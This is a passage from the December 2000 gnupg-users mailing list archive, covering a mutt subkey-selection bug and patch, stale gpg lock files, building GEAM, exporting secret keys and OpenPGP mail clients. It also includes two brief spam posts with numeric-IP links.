keys, I get a list of keys containing my DSA sub-key, but not the public key. I updated gpg.rc to from mutt-cvs, but the problem persists. If I manually enter the correct key id, I am thrown back to the "Sign as:" prompt. mutt-1.3.12 gpg-1.0.4 with Werner's latest patch for signature verification. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Wed Dec 6 19:06:43 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Wed, 6 Dec 2000 19:06:43 +0000 Subject: GPG signing problem In-Reply-To: <20001206174409.A1875@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 05:44:09PM +0000 References: <20001206174409.A1875@nmrc.ie> Message-ID: <20001206190643.A8078@nmrc.ie> > Dunno if this is a mutt or gpg problem ... Definitely a mutt problem. It was introduced between 1.3.11 and 1.3.12. | 6.3.101. pgp_ignore_subkeys | | Type: boolean | Default: yes | | Setting this variable will cause Mutt to ignore OpenPGP subkeys. | Instead, the principal key will inherit the subkeys' capabilities. | Unset this if you want to play interesting key selection games. Either the documentation is wrong, or my understanding of this option is wrong. Or it's a bug :) The default setting causes mutt to ignore the "real" key and choose the *wrong* key (subkey). | 1 + 1024/0x9186116D DSA es Lars Hecking | 2 + 1024/0xFB6F7CC9 RSA es Lars Hecking If I unset pgp_ignore_subkeys, it works as before. | 1 + 1024/0x83AC334A DSA -s Lars Hecking | 2 + 1024/0x9186116D ElG e- Lars Hecking | 3 + 1024/0xFB6F7CC9 RSA es Lars Hecking That comment about "interesting key selection games" seems blatant nonsense to me. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From awn@bcs.zp.ua Wed Dec 6 19:07:43 2000 From: awn@bcs.zp.ua (Andrew Nosenko) Date: Wed, 6 Dec 2000 21:07:43 +0200 Subject: GPG signing problem In-Reply-To: <20001206174409.A1875@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 05:44:09PM +0000 References: <20001206174409.A1875@nmrc.ie> Message-ID: <20001206210743.B2133@bcs.zp.ua> Lars Hecking wrote: : : Dunno if this is a mutt or gpg problem ... : : When I'm trying to "sign as" with my DSA keys, I get a list of keys : containing my DSA sub-key, but not the public key. I updated gpg.rc All correct. You should sign by your private key => mutt list your private keys. Your private key need for verification, not for signing. -- Andrew W. Nosenko (awn@bcs.zp.ua) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From roessler@does-not-exist.org Wed Dec 6 20:36:12 2000 From: roessler@does-not-exist.org (Thomas Roessler) Date: Wed, 6 Dec 2000 21:36:12 +0100 Subject: GPG signing problem In-Reply-To: <20001206190643.A8078@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 07:06:43PM +0000 References: <20001206174409.A1875@nmrc.ie> <20001206190643.A8078@nmrc.ie> Message-ID: <20001206213612.A22981@sobolev.does-not-exist.org> --QTprm0S8XgL7H0Dt Content-Type: multipart/mixed; boundary="azLHFNyN32YCQGCU" Content-Disposition: inline --azLHFNyN32YCQGCU Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2000-12-06 19:06:43 +0000, Lars Hecking wrote: > The default setting causes mutt to ignore the "real" key and choose > the *wrong* key (subkey). ups. Please try the attached patch. With respect to that notice on "interesting key selection games", you should in theory be able to use subkeys when you select them. Most likely, however, I should really make sure that I didn't add a pgp_principal_key() function call or two in the wrong places. --=20 Thomas Roessler --azLHFNyN32YCQGCU Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="patch-1.3.12.tlr.pgpkeyid.1" Content-Transfer-Encoding: quoted-printable Index: gnupgparse.c =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D RCS file: /home/roessler/cvsroot/mutt/gnupgparse.c,v retrieving revision 2.16 diff -u -r2.16 gnupgparse.c --- gnupgparse.c 2000/11/13 22:19:57 2.16 +++ gnupgparse.c 2000/12/06 20:29:03 @@ -216,8 +216,8 @@ { dprint (2, (debugfile, "key id: %s\n", p)); =09 - /* We really should do a check here */ - mutt_str_replace (&k->keyid, p); + if (!(*is_subkey && option (OPTPGPIGNORESUB))) + mutt_str_replace (&k->keyid, p); break; =20 } --azLHFNyN32YCQGCU-- --QTprm0S8XgL7H0Dt Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: 2.6.3in iQEVAwUBOi6jO9ImKUTOasbBAQHMFQgApgKfj1hoWKkPmZWcgwAv9+1bJzhRBrwl lMczR/2JJFVgcJ6VZKqYuDGwDrheGihJziKmbgpcW8aXVh1bJjxPClML8tdGM9w1 vez82iRpu+WWuj6GaWD11qjgXStFeAUUo2HeEVc/48YQojm/yPQJSGbnGlQQ2dV3 r+y5RAHWK5oK1vs1P/cPeirQm15cCVX4UmuYwUAJRtc/0ocAt60oIeMOzWe+hHks zSXpKOsQD8JS4QQMwRrv0Bit9H5+BM/WSHA+dIfh3tE979yCP2nRRO++k6mF0kDv tH98JWDi5zAi3k+TAhoATmC/RC29WMmngqHhLbhmvdNGIRhKwKBtzQ== =RGIB -----END PGP SIGNATURE----- --QTprm0S8XgL7H0Dt-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sen_ml@eccosys.com Thu Dec 7 01:15:39 2000 From: sen_ml@eccosys.com (sen_ml@eccosys.com) Date: Thu, 07 Dec 2000 10:15:39 +0900 (JST) Subject: openPG aware gui mail clients In-Reply-To: <1001206123653.ZM11048@ssadler.phy.bnl.gov> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> Message-ID: <20001207.101539.59676982.sen_ml@eccosys.com> From: "Stephen Adler" Subject: openPG aware gui mail clients Date: Wed, 6 Dec 2000 12:36:53 +0000 > Can someone recomend an openPG gui mail client? if you are a emacs user, there is Mew: http://www.mew.org/ also, with the help of members of the pgp-users@cryptorights.org mailing list, a while back i started collecting info about which mail clients support various versions of pgp (gnupg included), whether they support pgp/mime, etc. some members of the list were kind enough to host it. one such location is: http://rmarq.pair.com/pgp/mail-clients-pgp.html if anyone has any additions or changes that think should be made, i'm willing to incorporate them. the preferred way is via the aforementioned pgp-users list as reports will be seen by more than one pair of eyeballs ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From carlstephen33@writeme.com Thu Dec 7 03:37:09 2000 From: carlstephen33@writeme.com (carlstephen33@writeme.com) Date: Thu, 7 Dec 2000 11:37:09 +0800 (CST) Subject: [#1] Message-ID: <200012070337.LAA45434@ns1.capita.org> NEW AND EXCITING!! http://3506561041/iindex22/legal.html This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From carlstephen33@writeme.com Thu Dec 7 03:47:01 2000 From: carlstephen33@writeme.com (carlstephen33@writeme.com) Date: Thu, 7 Dec 2000 11:47:01 +0800 (CST) Subject: [#2] Message-ID: <200012070347.LAA52886@ns1.capita.org> HERE IS THE NEW SITE!! Flash Technology!! this is the future!! http://3506561041/iindex22/newflash.htm This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Thu Dec 7 07:34:12 2000 From: afx@atsec.com (Andreas Siegert) Date: Thu, 7 Dec 2000 08:34:12 +0100 Subject: waiting for lock... In-Reply-To: <20001206162417.A1388@nmrc.ie>; from lhecking@nmrc.ie on Wed, Dec 06, 2000 at 04:32:53PM +0000 References: <20001206171901.A3932@cray.muc.atsec.de> <20001206162417.A1388@nmrc.ie> Message-ID: <20001207083412.A567@cray.atsec.com> Quoting Lars Hecking (lhecking@nmrc.ie) on Wed, Dec 06, 2000 at 04:32:53PM +0000: > > Hi Andreas :) > > > what would that mean: > > > > $ gpg --no-verbose --batch --with-colons --list-keys 2CAE19B6 > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > Just go into ~/.gnupg and delete all .#* files. They must have been > left behind when the program exited abnormally. Thanks! It was not the .#l* file but trustdb.gpg.lock that caused it! The 1407 was putting me on the wrong trck, I was thinking PID here... cheers afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 08:22:31 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 09:22:31 +0100 Subject: waiting for lock... In-Reply-To: <20001207083412.A567@cray.atsec.com>; from afx@atsec.com on Thu, Dec 07, 2000 at 08:34:12AM +0100 References: <20001206171901.A3932@cray.muc.atsec.de> <20001206162417.A1388@nmrc.ie> <20001207083412.A567@cray.atsec.com> Message-ID: <20001207092230.J21969@gnupg.de> On Thu, 7 Dec 2000, Andreas Siegert wrote: > > > gpg: waiting for lock (hold by 1407 - probably dead) ... > > > > Just go into ~/.gnupg and delete all .#* files. They must have been > > left behind when the program exited abnormally. > > Thanks! It was not the .#l* file but trustdb.gpg.lock that caused it! > The 1407 was putting me on the wrong trck, I was thinking PID here... It is a PID, but one from a terminated process. The "probably dead" is needed due to the fact that the directory may be NFS mounted and the pid alone is not sufficient to check whether the process is really dead. I should add the hostname to the lockfile to be able to remove a stale lockfile. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 10:27:53 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 11:27:53 +0100 Subject: geam Message-ID: Hi, gibt's irgendwo ein downladbares Sourcepaket fuer GEAM? Vorzugsweise die Version, die sich seit "6 Monaten im Produktionseinsatz" befindet. Oder gibt's GEAM nur per CVS? Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 10:54:27 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 11:54:27 +0100 Subject: geam (nochmal) Message-ID: Hi, > Oder gibt's GEAM nur per CVS? Und was die CVS Version angeht, wie ist denn generell so der Status dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht einmal das "configure" Skript beiliegt. Ich gehe mal davon aus, dass ich mir das selbst zusammenbauen muss ? Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 11:08:03 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 12:08:03 +0100 Subject: geam (nochmal) In-Reply-To: ; from bsokolow@lucent.com on Thu, Dec 07, 2000 at 11:54:27AM +0100 References: Message-ID: <20001207120803.N21969@gnupg.de> On Thu, 7 Dec 2000, Bernd Sokolowsky wrote: > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > einmal das "configure" Skript beiliegt. Das wird per autoconf gebaut: $ aclocal ; autoheader; automake; autoconf Ich habe momentan keine Zeit ein Release zu machen. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ra@letras.de Thu Dec 7 11:44:42 2000 From: ra@letras.de (Ralph Angenendt) Date: Thu, 7 Dec 2000 12:44:42 +0100 Subject: geam (nochmal) In-Reply-To: ; from bsokolow@lucent.com on Thu, Dec 07, 2000 at 11:54:27AM +0100 References: Message-ID: <20001207124442.A30042@camioneta.letras.de> --RnlQjJ0d97Da+TV1 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Bernd Sokolowsky wrote: > Hi, >=20 > > Oder gibt's GEAM nur per CVS? >=20 > Und was die CVS Version angeht, wie ist denn generell so der Status > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > einmal das "configure" Skript beiliegt. >=20 > Ich gehe mal davon aus, dass ich mir das selbst zusammenbauen muss ? Errm, Bernd - english seems to be the preferred language in this list (rough translation): Hi, is GEAM only available via CVS? And while I'm at it: What is the general status of GEAM? One of the first things that came to my attention was the missing configure script. Am I right to presume that I have to build this package manually? Cheers, Ralph --RnlQjJ0d97Da+TV1 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6L3gqjB6yu/0L7eURAjxNAJ9pr14VEglbtreChczC6d6YRdBbWACfTCI+ Mw4peNeTeWy98kKKs/QOOi0= =7reT -----END PGP SIGNATURE----- --RnlQjJ0d97Da+TV1-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From bsokolow@lucent.com Thu Dec 7 11:57:56 2000 From: bsokolow@lucent.com (Bernd Sokolowsky) Date: 07 Dec 2000 12:57:56 +0100 Subject: geam (nochmal) In-Reply-To: Bernd Sokolowsky's message of "07 Dec 2000 11:54:27 +0100" References: Message-ID: Sorry for writing in german, here comes the translation: I asked if some downloadable packages for GEAM exist. Preferably something that is already in production use somewhere. Werner replied that he is currently not packaging this due to time shortage. Regarding the CVS sources I asked about how to build GEAM (there is no "configure" tree in the CVS tree). Werner's reply was: "aclocal ; autoheader; automake; autoconf". Since some of these tools are not available here on the HP-UX box, I'll try this evening at home on my Linux box. Cheers, Bernd. -- Bernd Sokolowky @ the job -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 7 12:08:58 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 7 Dec 2000 13:08:58 +0100 Subject: geam (once more) In-Reply-To: <20001207120803.N21969@gnupg.de>; from wk@gnupg.org on Thu, Dec 07, 2000 at 12:08:03PM +0100 References: <20001207120803.N21969@gnupg.de> Message-ID: <20001207130858.O21969@gnupg.de> On Thu, 7 Dec 2000, Werner Koch wrote: > On Thu, 7 Dec 2000, Bernd Sokolowsky wrote: > > > dieser Software. Auf Anhieb ist mir aufgefallen, dass noch nicht > > einmal das "configure" Skript beiliegt. [Ooops too] You have to use autoconf to build configure.in: $ aclocal ; autoheader; automake; autoconf Currently I have no time to do a regular release. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From sascha@meta-x.de Fri Dec 8 01:36:40 2000 From: sascha@meta-x.de (Sascha =?iso-8859-1?q?L=FCdecke?=) Date: 08 Dec 2000 02:36:40 +0100 Subject: openPG aware gui mail clients In-Reply-To: <20001207.101539.59676982.sen_ml@eccosys.com> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: The CVS gnus (version 5.8.8) has also a quite good integration of PGP and GPG. It is able to process S/MIME, too, though I haven't testet this yet. http://www.gnus.org/distribution.html Regards, Sascha -- I never miss a chance to have sex or appear on television -Gore Vidal- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 08:45:09 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 09:45:09 +0100 Subject: openPG aware gui mail clients In-Reply-To: ; from sascha@meta-x.de on Fri, Dec 08, 2000 at 02:36:40AM +0100 References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: <20001208094509.D21969@gnupg.de> On Fri, 8 Dec 2000, Sascha Lüdecke wrote: > The CVS gnus (version 5.8.8) has also a quite good integration of PGP > and GPG. It is able to process S/MIME, too, though I haven't testet ~~~~~~ By using which software? Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From me@dave.cx Fri Dec 8 09:23:27 2000 From: me@dave.cx (David Liu) Date: Fri, 8 Dec 2000 19:23:27 +1000 Subject: Exporting my secret key Message-ID: Hi, I'm just wondering how I would go about exporting and/or decrypting my GPG secret key for use with other PGP utilities? Thanks Dave PS: please CC me in any replies -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From explorer@flame.org Fri Dec 8 09:50:55 2000 From: explorer@flame.org (explorer@flame.org) Date: 8 Dec 2000 09:50:55 -0000 Subject: Cleaning bad signatures Message-ID: <20001208095055.23209.qmail@kechara.flame.org> I've started using gpg after a long no-pgp break. Way too long in fact. While I generally like gpg more than pgp 5.x under NetBSD, I have some questions. One, does --check-sig actually remove bad signatures? If not, what does? I'm getting tired of seeing warning messages on my screen. It would be a nice feature to _always_ be able to import public keys when one has the secret key. When I moved things from pgp by importing my secret ring then my public one, one key I had revoked a very long time ago was not self-signed. gpg didn't import it, which was rather annoying. It might be handy to have a --assign-ownertrust or --show-ownertrust command that will scan the public keyring, and for each key that is verified allow the ownertrust to be assigned (if not already there) and to show the values assigned. Lastly, do people see the need for a key server that allows more control over how keys are presented to the outside world? I'm considering writing one in my non-existant spare time, and even though I'm largely to blame for the existing keyserver key management, I think I can do it better if I find the time. :) Thanks, --Michael -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Nils@infosun.fmi.uni-passau.de Fri Dec 8 10:02:32 2000 From: Nils@infosun.fmi.uni-passau.de (Nils Ellmenreich) Date: Fri, 8 Dec 2000 11:02:32 +0100 (CET) Subject: openPG aware gui mail clients In-Reply-To: References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> Message-ID: <14896.45496.126154.88303@barber.fmi.uni-passau.de> >>>"S" == Sascha =?iso-8859-1?q?L=FCdecke?= writes: S> The CVS gnus (version 5.8.8) has also a quite good integration of PGP S> and GPG. It is able to process S/MIME, too, though I haven't testet S> this yet. A few weeks ago, we've tested CVS Gnus. It's very promising, but not everything works yet. I've had some sig verification problem - Emacs/Mew provides the signature as a separate MIME part which Gnus could not (yet) recognize. S/MIME is more incomplete, but they're actively working on it, too, doing an excellent job. Give it a few more weeks and it should be fine. When that's the case, I'll dump VM myself and switch to Gnus. The VM maintainer hasn't yet done anything regarding an OpenPGP implementation, and MailCrypt is just not sufficient anymore. Regards, Nils -- Nils Ellmenreich, Lst. f. Programmierung, Universitaet Passau, Germany -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From chrender@moondock.org Fri Dec 8 10:15:07 2000 From: chrender@moondock.org (Christoph Ender) Date: Fri, 8 Dec 2000 11:15:07 +0100 (CET) Subject: Exporting my secret key In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Fri, 8 Dec 2000, David Liu wrote: > Hi, > I'm just wondering how I would go about exporting and/or decrypting my GPG > secret key for use with other PGP utilities? You can use "--export-secret-keys" for that, e.g.: gpg -a --export-secret-keys However, I run into problems when using the (german) international PGP-Freeware-Version 6.5.1: Importing Public keys from GnuPG works just fine, but when trying to import a secret key I always get "sizeAdvise-Versprechen nicht eingehalten" (Did not keep sizeAdvise-Promise). Importing secret keys generated by PGP into GnuPG works, though. Regards, Christoph. - -- Christoph Ender chrender@moondock.org http://www.moondock.org/chrender/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQE6MLS6AwUc0Gp3bnURApvQAJ4u7JczMIY8dCev+J1psR5sVOh4jQCgtF4I WyMhru6MQhbV8h0et4075Mk= =AKmp -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 8 10:28:31 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 08 Dec 2000 11:28:31 +0100 Subject: openPG aware gui mail clients In-Reply-To: <20001208094509.D21969@gnupg.de> References: <1001206123653.ZM11048@ssadler.phy.bnl.gov> <20001207.101539.59676982.sen_ml@eccosys.com> <20001208094509.D21969@gnupg.de> Message-ID: <87g0jz8awg.fsf@deneb.enyo.de> Werner Koch writes: > > The CVS gnus (version 5.8.8) has also a quite good integration of PGP > > and GPG. It is able to process S/MIME, too, though I haven't testet > ~~~~~~ > By using which software? OpenSSL. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:48:53 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:48:53 +0100 Subject: Cleaning bad signatures In-Reply-To: <20001208095055.23209.qmail@kechara.flame.org>; from explorer@flame.org on Fri, Dec 08, 2000 at 09:50:55AM -0000 References: <20001208095055.23209.qmail@kechara.flame.org> Message-ID: <20001208124853.G21969@gnupg.de> On Fri, 8 Dec 2000, explorer@flame.org wrote: > Lastly, do people see the need for a key server that allows > more control over how keys are presented to the outside world? > I'm considering writing one in my non-existant spare time, > and even though I'm largely to blame for the existing > keyserver key management, I think I can do it better if > I find the time. :) You may want to contact me in this case; I have done some minor things into the same direction but due to non existent spare time... Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:54:44 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:54:44 +0100 Subject: Cleaning bad signatures In-Reply-To: <20001208095055.23209.qmail@kechara.flame.org>; from explorer@flame.org on Fri, Dec 08, 2000 at 09:50:55AM -0000 References: <20001208095055.23209.qmail@kechara.flame.org> Message-ID: <20001208125444.I21969@gnupg.de> On Fri, 8 Dec 2000, explorer@flame.org wrote: > One, does --check-sig actually remove bad signatures? If > not, what does? I'm getting tired of seeing warning It is not possible to remove bad signatures - every import would merge them back in. Of course it would we possible to have an option to not import bad signatures - nonody has yet requested for it. > It might be handy to have a --assign-ownertrust or > --show-ownertrust command that will scan the public keyring, Yes. As soon as we will see more and more GUIs for gpg we can implement it. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:46:20 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:46:20 +0100 Subject: Exporting my secret key In-Reply-To: ; from me@dave.cx on Fri, Dec 08, 2000 at 07:23:27PM +1000 References: Message-ID: <20001208124620.F21969@gnupg.de> On Fri, 8 Dec 2000, David Liu wrote: > I'm just wondering how I would go about exporting and/or decrypting my GPG > secret > key for use with other PGP utilities? gpg --export-secret-keys -a >foo.asc You should also export your public key; do this before you do the above. So if you want to export the key 0x12345678 do this: gpg --export -a 0x12345678 > pub+sec.asc gpg --export-secret-keys -a 0x12345678 >> pub+sec.asc Note: The forthcoming release of GnuPG does require that you use the option --allow-secret-key-import to _import_ a secret key; however it will tell you this if it sees a secret key. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 11:51:14 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 12:51:14 +0100 Subject: Exporting my secret key In-Reply-To: ; from chrender@moondock.org on Fri, Dec 08, 2000 at 11:15:07AM +0100 References: Message-ID: <20001208125114.H21969@gnupg.de> On Fri, 8 Dec 2000, Christoph Ender wrote: > fine, but when trying to import a secret key I always get > "sizeAdvise-Versprechen nicht eingehalten" (Did not keep sizeAdvise-Promise). Huh? Someone should grep the source to tell us what this means. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From graham@todd276.worldonline.co.uk Fri Dec 8 12:27:19 2000 From: graham@todd276.worldonline.co.uk (Graham) Date: Fri, 08 Dec 2000 12:27:19 GMT Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <20001208125444.I21969@gnupg.de> References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> Message-ID: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi there, Werner Koch, On 08 December 2000, I received the following message from you regarding "Cleaning bad signatures" WK> Yes. As soon as we will see more and more GUIs for gpg we can WK> implement it. WK> WK> Werner Any info on the progress of the Windows GUI? Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 08 December 2000 12:25:18 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) Comment: Please use my PGP Key ID: 0x99DB10BD iD8DBQE6MNOVtwKLKus4nE4RAgXlAJ9IIIBv21IxWtCzWrcLmwq2LN4zfwCfZP9J qVvhhuKnugMr+an1HZiiSliIPwMFATow05W3Aosq6zicThECBeUAn0dW+lJWVX4s GtSSeNfLUGhMCDOMAKCTQ3RGj8bBCFbnpb0nXTPgnVDcvw== =8z/M -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Fri Dec 8 12:45:27 2000 From: wk@gnupg.org (Werner Koch) Date: Fri, 8 Dec 2000 13:45:27 +0100 Subject: Windows GUI In-Reply-To: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Fri, Dec 08, 2000 at 12:27:19PM +0000 References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001208134527.P21969@gnupg.de> On Fri, 8 Dec 2000, Graham wrote: > Any info on the progress of the Windows GUI? GPGME runs fine on windows now and Timo is going to use this in WinPT. I am currently working on the COM+ thing. Expect something before Christmas. Any VB programmers are welcome to support us as soon as the COM+ thing works. I have no clue about VB although my first professional job was related to IBM's BASIC - well, it was back in the years of a 8088. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From ingo@mathA.rwth-aachen.de Fri Dec 8 13:54:26 2000 From: ingo@mathA.rwth-aachen.de (Ingo Kloecker) Date: Fri, 8 Dec 2000 14:54:26 +0100 Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> Message-ID: <00120814542604.15989@atlas> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday, 8. December 2000 13:27, Graham wrote: > Please PGP/GnuPG sign mail for verification and encrypt for internet > security I'd like to verfiy your mail very much. But GnuPG says: gpg: can't handle these multiple signatures Regards, Ingo - -- Ingo Klöcker Lehrstuhl A für Mathematik RWTH Aachen 52056 Aachen -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6MOgSqUQWN/hplRsRAjEKAKCxda1hQgyYd3LGqSr7bcuasMUTkACfWB7C Zt2SGjimnGAXWjhb9JKEA78= =KLCG -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Fri Dec 8 14:07:18 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Fri, 8 Dec 2000 14:07:18 +0000 Subject: Windows GUI (was Cleaning bad signatures) In-Reply-To: <00120814542604.15989@atlas>; from ingo@mathA.rwth-aachen.de on Fri, Dec 08, 2000 at 02:54:26PM +0100 References: <20001208095055.23209.qmail@kechara.flame.org> <20001208125444.I21969@gnupg.de> <20001208122518.9701.GRAHAM@todd276.worldonline.co.uk> <00120814542604.15989@atlas> Message-ID: <20001208140718.A15481@nmrc.ie> Ingo Kloecker writes: > On Friday, 8. December 2000 13:27, Graham wrote: > > Please PGP/GnuPG sign mail for verification and encrypt for internet > > security > > I'd like to verfiy your mail very much. But GnuPG says: > gpg: can't handle these multiple signatures Same problem here. His mailer (Becky?) is possibly broken. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From explorer@flame.org Fri Dec 8 16:56:57 2000 From: explorer@flame.org (Michael Graff) Date: 08 Dec 2000 08:56:57 -0800 Subject: Cleaning bad signatures In-Reply-To: Werner Koch's message of "Fri, 8 Dec 2000 